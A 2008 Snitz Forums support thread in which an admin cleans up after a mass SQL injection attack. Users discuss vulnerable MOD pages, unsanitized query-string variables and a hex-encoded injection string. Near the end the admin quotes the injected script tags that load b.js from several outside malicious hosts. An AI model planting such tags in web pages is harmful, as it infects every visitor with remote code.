Snitz™ Forums 2000
https://forum.snitz.com/forumTopic/Posts/67358?pagenum=1
05 November 2025, 06:24
Topic
richfed
Vulnerable MOD Pages ...
28 June 2008, 07:10
At least according to my web host:
We have scanned your site for vulnerability and found the following pages which are vulnerable.. /messageboard/avatar_legend.asp
/messageboard/guestbook.asp
/messageboard/myowngoogle.asp
/messageboard/Photo_Album_view.asp
/messageboard/pop_report.asp
Hope that may help some of you out there.
PS - Not sure where the best place is to post this. Move as appropriate!!<
Replies ...
leatherlips
28 June 2008, 07:29
What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.<
modifichicci
28 June 2008, 08:08
I think in Photo_album_view we have to sanitize these variables: strPhotoName = trim(request.QueryString("PhotoName")) strDescription = trim(request.QueryString("Description")) strPhotoSearch = trim(request.QueryString("Photo_Search"))
I think the first two are numeric, so the general fix for numeric could be useful, but the last is a string, so i don't know if a sqlstring it's enought or not.
There is a validate input function in inc photo functions but at this moment I don't know how to use it..<
HuwR
28 June 2008, 08:52
I would be interested in why your host thinks all those files are vunerable, I have seen the results of automated vulnerability checkers, and they were quite frankly completely useless.
If they have manually scanned your logs after an attack, then it is extremely unlikely that more than one file was used for an attack, and is generally the last file accessed by the hacker, but there may be several attempts on various files prior to the actual succesful attempt.
obviously if they have some better evidence then fair enough<
SiSL
28 June 2008, 09:01
There is some SQL Injection checkers for hosts, that might be possible checking queryies...<
richfed
28 June 2008, 10:00
Originally posted by leatherlips What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.
I wish I could answer that! I'm hoping someone can ...
Meanwhile, my host sent this:
We can see few SQL injetion attempts in the logs through the asp script topic.asp
These are found in the logs just before the first entry of the given pattern
The sql statements are encoded to Hexadecimal code ( start from: SET%20@S=CAST( . You can try to decode it using any online tools which converts Hexadecimal to string ). If someone could make English out of this, there areprobably a few here who would be most grateful!!
<
ruirib
28 June 2008, 11:10
That was just a hack attempt. Topic.asp is secure and it has been for as long as I can remember!<
ruirib
28 June 2008, 11:14
Rich, you need to fix your forum database, anyone who visits your forum is at get risk of getting virus infected. It's amazing that after a couple days your host hasn't addressed this. The script I posted fixes all of it in a few seconds!
Please take the forum down until is fixed. If someone unprotected visits your forum, they are at risk, and you will have some responsability in that, too.<
richfed
28 June 2008, 12:06
Done, ruirib. I just contacted my host once again about running that script. Thanks -<
ruirib
28 June 2008, 12:14
Do let them know that they will need to replace for the actual "infectious" link in the script, otherwise it won't have any effect.<
richfed
28 June 2008, 14:27
Yes, I had inserted that before I sent it to them. They ran it; said 8 rows were infected. I still see the script - <script src=http://www.rid34.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.bin963.com/b.js></script> - in the field Title Image Location in the Main Forum Config area. How in the world can I get that out????? I remove it, it just pops back in. <
ruirib
28 June 2008, 14:51
Seems like they used several links. You will need to run the script once for each link, of course, changing the link in the script.<
richfed
28 June 2008, 15:42
Got it removed, finally. You da man, ruirib!! Thanks ...<